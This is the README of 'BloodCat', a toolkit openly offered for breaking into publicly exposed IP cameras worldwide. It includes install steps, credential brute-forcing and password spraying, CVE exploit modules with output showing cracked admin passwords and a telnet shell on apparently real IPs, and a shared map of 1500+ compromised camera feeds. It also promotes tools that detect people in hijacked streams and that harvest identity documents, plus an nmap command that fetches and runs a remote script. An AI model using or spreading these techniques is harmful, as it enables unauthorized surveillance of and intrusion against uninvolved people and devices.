A tool for hacking into publicly exposed network cameras, with support for specifying country and region.
PS: This tool supports weak‑credential and brute‑force testing against most mainstream network camera models. However, some devices with enhanced security mechanisms deliberately obfuscate or conceal their fingerprinting characteristics, which means the tool is not universally effective. Future updates will progressively introduce additional camera‑related CVE‑based vulnerability detection plugins, aiming to improve success rates while reducing unnecessary probing traffic.
🐈⬛ Have you ever wondered whether there are publicly accessible cameras watching the streets you walk every day? Once you become aware of their existence, you may realize how close and real online exposure actually is.
🤦♂️ Are you still struggling with the lack of practical tools for exploiting IP camera vulnerabilities?
🌏 BloodCat officially provides over 🔥1500+🔥 publicly accessible IP camera examples worldwide.
🎥 A comprehensive IP Camera penetration testing toolkit, featuring default credential enumeration, CVE exploitation, and additional capabilities — with support for collaborative team usage.
🛡️ BloodCat does not collect any identity-related information.
💻 BloodCat is compatible with Windows, Linux, and macOS.
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
- Video
- Install
- Bloodcat
- Evil bat
- Shodan cat
- PicThief
- Bloodcat CVE
- Bloodcat Global Map
- Bloodcat Global Map Terminal
- Bloodcat Lan Map
- Bloodcat Editor
- Bloodcat Nmap (Run immediately)
Disk space requirement: Available space > 600 MB
$ sudo apt update && sudo apt install python3-pyqt5.qtwebengine -y
$ git clone https://github.com/MartinxMax/BloodCat.git
$ cd BloodCat && python3 -m venv bloodcat
$ source ./bloodcat/bin/activate
(bloodcat)$ python -m pip install --upgrade pip
(bloodcat)$ pip install opencv-python aiohappyeyeballs aiohttp aiosignal async-timeout attrs certifi charset-normalizer frozenlist geoip2 idna maxminddb multidict propcache pycryptodome PyQt5 PyQt5-Qt5 PyQt5_sip PyQtWebEngine PyQtWebEngine-Qt5 requests typing_extensions urllib3 yarl numpy About:
- Integrates with search engines, enabling target filtering and continuous scanning operations by country, region, or city.
- Operates at the RTSP protocol, providing high stealth and efficiency.
- Performs camera fingerprint identification first, automatically filtering out and excluding honeypot systems, then enumerates usernames and passwords of target network cameras.
- Supports password spraying, applicable to single IPs or multiple IP ranges.
- Supports bc data updating and merging, facilitating long-term maintenance and management.
- Supports writing Hikvision camera credential header information into bc files, which can be visualized on a map.
Scanner I recommend: https://github.com/MartinxMax/n1ght0wl.git
After BloodCat successfully gains access to a camera, it will provide you with a playback link. However, you don’t need to open the link manually.
Simply reload the module in BloodCat-Map, then use the IP search in the top-right corner to locate the target. Click the target, and the video will play directly.
(bloodcat)$ python3 bloodcat.py -h
(bloodcat)$ python3 bloodcat.py --ip "188.134.80.244:554"
(bloodcat)$ python3 bloodcat_map.py
(bloodcat)$ python3 bloodcat.py --ips target.txt
(bloodcat)$ python3 bloodcat_map.py
(bloodcat)$ python3 bloodcat.py --country CN --region HK --key <FOFA-API-KEY>
Place all .bc files that need to be merged into the ./data/ directory.
(bloodcat)$ python3 bloodcat.py --merge
After execution,
./data/20260108_171450.bc will be a deduplicated and merged .bc file.
Replace the original global.bc file, then right-click Reload in BloodCat_Map:
(bloodcat)$ mv ./data/20260108_171450.bc ./data/global.bc
(bloodcat)$ python3 bloodcat.py --live ./data/global.bc
live_20260213_234933.bc
(bloodcat)$ python3 bloodcat.py --update
(bloodcat)$ python3 bloodcat_cve.py
Bloodcat@exp# showMatching Modules
==============================================================================
ID Name Description
------------------------------------------------------------------------------
1 hikvision/cve-2017-7921 Hikvision auth bypass
2 liandian/cve-2025-7503 Liandian IP Camera Telnet Hardcoded Credentials & Plaintext WiFi Credentials Leak
iVMS-4200 download link : https://github.com/MartinxMax/BloodCat/releases/tag/play
Bloodcat@exp# use 1
Bloodcat@(CVE-2017-7921)# showParameter | Value | Description
----------------------------------------------------------------------
ips | | Hosts file (<IP>:<Port>)
threads | 10 | Thread count
output_type | json | json / csv
output_path | ./result.json| Output file
Bloodcat@(CVE-2017-7921)# set ips /home/maptnh/Desktop/2/bloodcat/BloodCat/tar.txt
Bloodcat@(CVE-2017-7921)# runBloodcat@(CVE-2017-7921)# run
[*] Successfully read 3 valid targets
[*] Start cracking (3 targets, threads=10)
[+] Crack success X.X.X.X:80 => admin:dddddd
[!] 1.59.71.189:80 Request timeout (> 3 seconds)
[+] Crack success X.X.X.X:80 => admin:xxxxx
[*] Start scanning SDK ports (Range: 8000-8100)...
[SDK Crack Success] X.X.X.X:8000
[SDK Crack Success] X.X.X.X:8000
[*] JSON exported successfully: ./result.json (Size: 362 bytes, Number of devices: 2)
[*] Done! Exported 2 devices in total
Bloodcat@exp# use 2
Bloodcat@(CVE-2025-7503)# showParameter | Value | Description
----------------------------------------------------------------------
ip | | ip address
port | 23 | telnet port
timeout | 10 | timeoutBloodcat@(CVE-2025-7503)# set ip X.X.X.X
Bloodcat@(CVE-2025-7503)# run[+] Sending payload to X.X.X.X:23 ...
_ (`-. (`\ .-') /` .-') _ ('-. _ .-') _
( (OO ) `.( OO ),' ( OO ) )_( OO)( ( OO) )
_.` \,--./ .--. ,--./ ,--,'(,------.\ .'_
(__...--''| | | | \ | |\ | .---',`'--..._)
| / | || | | |, | \| | )| | | | \ '
| |_.' || |.'.| |_)| . |/(| '--. | | ' |
| .___.'| | | |\ | | .--' | | / :
| | | ,'. | | | \ | | `---.| '--' /
`--' '--' '--' `--' `--' `------'`-------'
cat /tmp/wificonf/wpa_supplicant.conf
ctrl_interface=/var/run/wpa_supplicant
update_config=1
V380-linux# whoami
whoami
ls -la
-sh: whoami: not found
V380-linux# ls -la
drwxr-xr-x 19 1000 root 218 Jan 8 2022 .
drwxr-xr-x 19 1000 root 218 Jan 8 2022 ..
drwxr-xr-x 2 1000 root 813 Feb 15 2022 bin
drwxrwxrwt 4 root root 2680 Jan 1 1970 dev
drwxr-xr-x 7 1000 root 350 Feb 12 2022 etc
drwxr-xr-x 3 1000 root 30 Jan 13 2022 ext
drwxr-xr-x 2 1000 root 3 Sep 9 2011 home
lrwxrwxrwx 1 root root 9 Jan 8 2022 init -> sbin/init
drwxr-xr-x 3 1000 root 773 Jan 7 2022 lib
drwxr-xr-x 5 1000 root 52 Jan 4 2022 mnt
drwxr-xr-x 7 1000 1000 83 Aug 18 2022 mvs
drwxr-xr-x 2 1000 root 3 Oct 17 2011 opt
dr-xr-xr-x 62 root root 0 Jan 1 1970 proc
drwxr-xr-x 2 1000 root 3 Sep 9 2011 root
drwxr-xr-x 2 1000 root 433 Jan 21 2022 sbin
drwxr-xr-x 2 1000 root 3 Sep 9 2011 srv
dr-xr-xr-x 11 root root 0 Jan 1 1970 sys
drwxrwxrwt 3 root root 140 Feb 7 13:49 tmp
drwxr-xr-x 6 1000 root 65 Jan 18 2022 usr
drwxrwxrwt 6 root root 120 Jan 1 1970 varhttps://github.com/MartinxMax/evil-b4t
Evil‑Bat is a real‑time human detection and activity logging tool based on remote network cameras.
It analyzes RTSP video streams to identify the presence of living humans and automatically records key moments when people appear in the camera view.
If you don’t have a Shodan membership, this tool helps you maximize the number of IP addresses you can retrieve from Shodan.
https://github.com/MartinxMax/shodancat
This is a tool built on Flask API, OCR (optical character recognition), and YOLO-based intelligent detection, designed to identify images that may contain potentially leaked identity credentials.
The client enables sorting and organizing of images containing sensitive identity credentials without the need for any dependency installation.
The server exposes an open identification API interface to intelligently detect potential identity credentials.
https://github.com/MartinxMax/PicThief
(bloodcat)$ python3 bloodcat_map.py
By entering a remote data URL(BloodCat Map API), you can load external datasets.
You may test using the official BloodCat database:
https://raw.githubusercontent.com/MartinxMax/db/refs/heads/main/blood_cat/global.bc
PS: For your own anonymity, do not import or use untrusted BloodCat Map API endpoints, as they may collect your IP address (unless you are using a proxy).
You can also copy API database links from other BloodCat-Map instances:
The target data will be loaded and displayed on the map. If you need to remove an entry, click the X on the right side. Remote-loaded raw data is not automatically saved locally, but the remote URL will be written into the configuration file.
You can enter keywords here to perform fuzzy matching on targets. This allows you to quickly lock and track specific targets on the map.
To use the chat feature, all team members must: · Be on the same local network (LAN) · Run BloodCat-Map simultaneously
The good news is: · No need to enter peer IP addresses · No need to worry about sniffing attacks · Chat packets are encrypted
TEAM A:
TEAM B:
(bloodcat)$ python ./bloodcat_map_terminal.py
Here’s a useful trick: if you’re using Termux, after setting up the BloodCat environment on one host machine, you can use the socat command to forward the surveillance stream to another host that doesn’t have BloodCat installed.
(bloodcat)$ sudo apt install socat
(bloodcat)$ socat TCP-LISTEN:9999,fork,reuseaddr EXEC:"python ./bloodcat_map_terminal.py"
(Termux)$ pkg install netcat-openbsd -y
(Termux)$ nc 192.168.67.131 9999
BloodCatMap-Terminal# help
=== BloodCat Map Terminal - Help Manual ===
Commands:
help - Show this help message
show - Show all entries with detailed fields (global ID)
show brief - Show brief list (global ID, IP, Source)
search <keyword> - Search entries (supports: IP, RTSP, ASN, sys_org, network)
play <global_id> - Play RTSP stream by GLOBAL ID
info <global_id> - Show detailed information by GLOBAL ID
reload - Reload all data (local + remote)
reset - Reset filter to show all entries
add <url> - Add remote DB URL to config
remove <url> - Remove remote DB URL from config
urls - List all configured remote URLs
exit/quit - Exit the consoleBloodCatMap-Terminal# search x.x.x.x
BloodCatMap-Terminal# play 1226
PS: This Nmap version only supports detecting anonymous public cameras and cannot brute‑force camera account passwords. The good news is that you don’t need to install most of BloodCat’s core dependencies to perform the detection.
$ sudo apt install nmap ffmpeg -y
ip=<Target_X.X.X.X>; nmap -Pn -p "$(curl -s https://raw.githubusercontent.com/MartinxMax/BloodCat/refs/heads/main/TOP1000_Camera_Port.txt | grep -oE '[0-9]+' | sort -n | uniq | paste -sd,)" --script <(curl -s https://raw.githubusercontent.com/MartinxMax/BloodCat/refs/heads/main/bloodcat.nse) $ip
ips=<File_Name>; nmap -Pn -p "$(curl -s https://raw.githubusercontent.com/MartinxMax/BloodCat/refs/heads/main/TOP1000_Camera_Port.txt | grep -oE '[0-9]+' | sort -n | uniq | paste -sd,)" --script <(curl -s https://raw.githubusercontent.com/MartinxMax/BloodCat/refs/heads/main/bloodcat.nse) -iL $ips
$ ffplay -fs -rtsp_transport tcp rtsp://admin:123456@x.x.x.x:554/1
After importing a CSV or BC configuration file, you can: 1.Filter targets by specific country/region 2.Perform fuzzy matching on fields (e.g. country, keyword, etc.) 3.Re-export only the matched/selected targets 4.Visualize all target cameras directly on a world map using geolocation data
(bloodcat)$ python3 bloodcat_editor.py
Click Import CSV configuration file.
View the geographic locations of all Hikvision cameras on the map.
For example, searching “Japan” in the country field will display all related entries. All matched items can be auto-selected, then export only the checked targets.
Finally, use iVMS-4200 to play the exported devices.
Download link : https://github.com/MartinxMax/BloodCat/releases/tag/play
This is a internal network camera viewer
Test file:
https://github.com/MartinxMax/BloodCat/releases/download/play/BloodCat_Map_LAN_Test.zip
(192.168.0.102)$ unzip BloodCat_Map_LAN_Test.zip
(192.168.0.102)$ cd BloodCat_Map_LAN_Test
(192.168.0.102)$ bash lunch.sh
(192.168.0.107)$ unzip BloodCat_Map_LAN_Test.zip
(192.168.0.107)$ cd BloodCat_Map_LAN_Test
(192.168.0.107)$ bash lunch.sh# target.txt
192.168.0.107:8554
192.168.0.102:8554$ python3 bloodcat.py --ips target.txt
$ python3 bloodcat_map_lan.py
